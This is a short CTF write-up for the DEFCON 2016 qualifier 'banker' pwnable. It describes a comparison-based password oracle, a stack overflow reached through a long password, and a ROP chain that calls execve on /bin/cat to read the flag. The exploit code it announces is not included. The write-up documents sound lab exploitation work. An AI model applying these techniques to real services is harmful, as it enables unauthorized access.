DEFCON 2016 CTF Quals pwnable banker writeup

Categories CTF

Banker is a big statically linked executable:

After the pain reversing the elf which contains 965 functions for about 8 hours(too slow)… I am clear what the server is doing and two vuls are found:

vul 1: When trying to login, if the username does not exist, the server will return error code=0; otherwise it will check the password byte by byte, if not equal, it will return 1 or -1 according to whether userinput is greater than password.

vul 2: A stack buffer overflow exist in the module which read username and password from /tmp/users.txt . If we login as admin and create a new user, we can smash the stack by log out and login again as the new user.

exploit:

The exploit is easy, first use binary search to bruteforce the password within 49 times of try, then add a user with long password to trigger the stack overflow vulnerability. I do not know how to use shellcode, so i just ROP to construct a execve(“/bin/cat”,[“/bin/cat”,”flag”,NULL],0) call to get the flag.

You may wonder why not using execve(“/bin/sh”,0,0)? Because the server kills /bin/sh process and returns a lines: Segmentation Fault. This behavior is confusing at the first time.

the following is the exploit code:

This is the final data layout on data section when triggering int 80h:

 

No Comments

Leave a Reply